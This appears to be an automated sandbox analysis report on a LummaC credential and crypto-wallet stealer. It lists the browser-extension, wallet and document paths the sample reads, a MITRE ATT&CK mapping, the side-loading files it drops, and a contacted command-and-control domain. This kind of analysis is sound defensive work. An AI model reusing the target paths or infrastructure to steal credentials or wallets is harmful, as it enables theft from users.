Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	11 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	2 System Time Discovery	Remote Services	12 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Registry Run Keys / Startup Folder	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSASS Memory	13 File and Directory Discovery	Remote Desktop Protocol	21 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	212 Process Injection	14 Obfuscated Files or Information	Security Account Manager	134 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	11 Software Packing	NTDS	231 Security Software Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	2 Process Discovery	SSH	Keylogging	115 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 DLL Side-Loading	Cached Domain Credentials	121 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	121 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
IaslcsMo.txt.ps1	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\gvpkoxippfwsu	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\UPEC\QtCore4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\UPEC\QtGui4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\UPEC\QtNetwork4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\UPEC\QtXml4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\UPEC\StarBurn.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\UPEC\msvcp100.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\UPEC\msvcr100.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\VWPGdipf\Data\Updater.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\VWPGdipf\Data\d3dcompiler_47.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\VWPGdipf\Data\ffmpeg.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\VWPGdipf\NAudio.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\VWPGdipf\QtCore4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\VWPGdipf\QtGui4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\VWPGdipf\QtNetwork4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\VWPGdipf\QtXml4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\VWPGdipf\RcClientBase.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\VWPGdipf\Resource.ct	0%	ReversingLabs
C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe	3%	ReversingLabs
C:\Users\user\AppData\Roaming\VWPGdipf\StarBurn.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\VWPGdipf\UpdateClient.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\VWPGdipf\UpdateCommon.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\VWPGdipf\msvcp100.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\VWPGdipf\msvcr100.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://www.digicert.c	0%	Avira URL Cloud	safe
http://www.reneelab.it/	0%	Avira URL Cloud	safe
http://support.reneelab.com/anonymous_requests/newstore/buy-renee-passnowentrare-nel-bios.htmlItalia	0%	Avira URL Cloud	safe
http://support.reneelab.com/anonymous_requests/new	0%	Avira URL Cloud	safe
https://downloads.reneelab.com/passnow/passnow_cnhttps://downloads.reneelab.com.cn/passnow/passnow_x	0%	Avira URL Cloud	safe
https://downloads.reneelab.com.cn/download_api.php	0%	Avira URL Cloud	safe
https://downloads.reneelab.com/download_api.php	0%	Avira URL Cloud	safe
http://www.reneelab.biz/	0%	Avira URL Cloud	safe
https://marchhappen.cyou/api	0%	Avira URL Cloud	safe
http://www.reneelab.fr/	0%	Avira URL Cloud	safe
http://www.reneelab.cc/	0%	Avira URL Cloud	safe
http://bug.reneelab.com	0%	Avira URL Cloud	safe
http://b.chenall.net/menu.lst	0%	Avira URL Cloud	safe
http://qt.digia.com/	0%	Avira URL Cloud	safe
http://www.reneelab.ru/	0%	Avira URL Cloud	safe
http://isecure-a.reneelab.com/webapi.php?code=	0%	Avira URL Cloud	safe
http://www.reneelab.de/	0%	Avira URL Cloud	safe
http://grub4dos.chenall.net/e/%u)	0%	Avira URL Cloud	safe
http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0D	0%	Avira URL Cloud	safe
https://downloads.reneelab.com/download_api.phphttps://downloads.reneelab.com.cn/download_api.php?ac	0%	Avira URL Cloud	safe
http://www.reneelab.es/	0%	Avira URL Cloud	safe
http://www.trialpay.com/productpage/?c=3016dc6&tid=6rpipbo	0%	Avira URL Cloud	safe
https://www.reneelab.com	0%	Avira URL Cloud	safe
http://www.reneelab.pl/	0%	Avira URL Cloud	safe
http://www.reneelab.de/product-land-237.htmlhttp://support.reneelab.com/anonymous_requests/newstore/	0%	Avira URL Cloud	safe
http://www.reneelab.com/product-land-188.htmlhttp://support.reneelab.com/anonymous_requests/newstore	0%	Avira URL Cloud	safe
http://www.reneelab.com.cn/	0%	Avira URL Cloud	safe
http://bugreports.qt-project.org/	0%	Avira URL Cloud	safe
http://www.reneelab.es/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newstore/	0%	Avira URL Cloud	safe
http://trolltech.com/xml/features/report-whitespace-only-CharDatahttp://xml.org/sax/features/namespa	0%	Avira URL Cloud	safe
https://www.reneelab.comwww.reneelab.comhttp://https://0	0%	Avira URL Cloud	safe
http://isecure.reneelab.com.cn/webapi.php?code=	0%	Avira URL Cloud	safe
marchhappen.cyou	0%	Avira URL Cloud	safe
http://bug.reneelab.com/psw_report.phpLicenseCodePSW_RENEELB_WINx86_20201003User	0%	Avira URL Cloud	safe
http://www.reneelab.kr/	0%	Avira URL Cloud	safe
http://www.reneelab.jp/	0%	Avira URL Cloud	safe
http://www.winimage.com/zLibDll1.2.6	0%	Avira URL Cloud	safe
https://downloads.reneelab.com/passnow/passnow_	0%	Avira URL Cloud	safe
http://trolltech.com/xml/features/report-start-end-entityUnknown	0%	Avira URL Cloud	safe
http://www.reneelab.net/	0%	Avira URL Cloud	safe
http://qt.digia.com/product/licensing	0%	Avira URL Cloud	safe
http://www.reneelab.net//reset-windows-password.htmlhttp://support.reneelab.com/anonymous_requests/n	0%	Avira URL Cloud	safe
http://www.reneelab.com.cn/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newst	0%	Avira URL Cloud	safe
http://isecure.reneelab.com/webapi.php?code=	0%	Avira URL Cloud	safe
http://www.reneelab.it/reimpostare-passwordi-di-windows-login.html	0%	Avira URL Cloud	safe
http://isecure.reneelab.com.cn/webapi.php?code=http://isecure-a.reneelab.com/webapi.php?code=http://	0%	Avira URL Cloud	safe
http://www.reneelab.com/	0%	Avira URL Cloud	safe
http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()	0%	Avira URL Cloud	safe
http://www.reneelab.biz/redefinir-senha-de-admin-logon-windows.htmlhttp://support.reneelab.com/anony	0%	Avira URL Cloud	safe
http://www.reneelab.jp/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newstore/	0%	Avira URL Cloud	safe
https://downloads.reneelab.com.cn/passnow/passnow_	0%	Avira URL Cloud	safe
http://www.reneelab.pl/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newpurcha	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
rentry.co	172.67.75.40	true	false		high
marchhappen.cyou	172.67.129.193	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://marchhappen.cyou/api	true	Avira URL Cloud: safe	unknown
https://rentry.co/feouewe5/raw	false		high
marchhappen.cyou	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://repository.certum.pl/ctsca2021.cer0A	powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.certum.pl/ctsca2021.crl0o	powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://downloads.reneelab.com/passnow/passnow_cnhttps://downloads.reneelab.com.cn/passnow/passnow_x	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
https://www.digicert.c	Set-up.exe, 00000003.00000002.1981077927.0000000003204000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088488029.0000000003744000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vmware.com/0	Set-up.exe, 00000003.00000002.1981445677.0000000003AF6000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000006.00000002.2079070422.0000000005222000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2088561371.0000000003869000.00000004.00000020.00020000.00000000.sdmp	false		high
http://support.reneelab.com/anonymous_requests/newstore/buy-renee-passnowentrare-nel-bios.htmlItalia	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://support.reneelab.com/anonymous_requests/new	Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.fr/	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
https://downloads.reneelab.com.cn/download_api.php	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.it/	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://xml.org/sax/features/namespace-prefixes	Set-up.exe, 00000003.00000002.1986792279.000000006F829000.00000002.00000001.01000000.0000000D.sdmp, Set-up.exe, 00000008.00000002.2095007049.000000006F829000.00000002.00000001.01000000.0000000D.sdmp	false		high
http://contoso.com/rdweb/Feed/webfeed.aspx.	powershell.exe, 00000000.00000002.1921287558.000001F943B57000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.reneelab.biz/	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
https://downloads.reneelab.com/download_api.php	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://bug.reneelab.com	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.cc/	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://qt.digia.com/	Set-up.exe, 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.ru/	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.de/	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://subca.ocsp-certum.com05	powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://b.chenall.net/menu.lst	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://isecure-a.reneelab.com/webapi.php?code=	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://subca.ocsp-certum.com02	powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0D	Set-up.exe, 00000003.00000002.1986587085.000000006F009000.00000002.00000001.01000000.0000000C.sdmp	false	Avira URL Cloud: safe	unknown
http://grub4dos.chenall.net/e/%u)	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://subca.ocsp-certum.com01	powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.certum.pl/ctnca2.crl0l	powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://repository.certum.pl/ctnca2.cer09	powershell.exe, 00000000.00000002.1921287558.000001F9445BB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://downloads.reneelab.com/download_api.phphttps://downloads.reneelab.com.cn/download_api.php?ac	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.es/	Set-up.exe, 00000003.00000002.1979839445.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000003.00000000.1885314618.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000002.2086805197.0000000000734000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2015962959.0000000000734000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
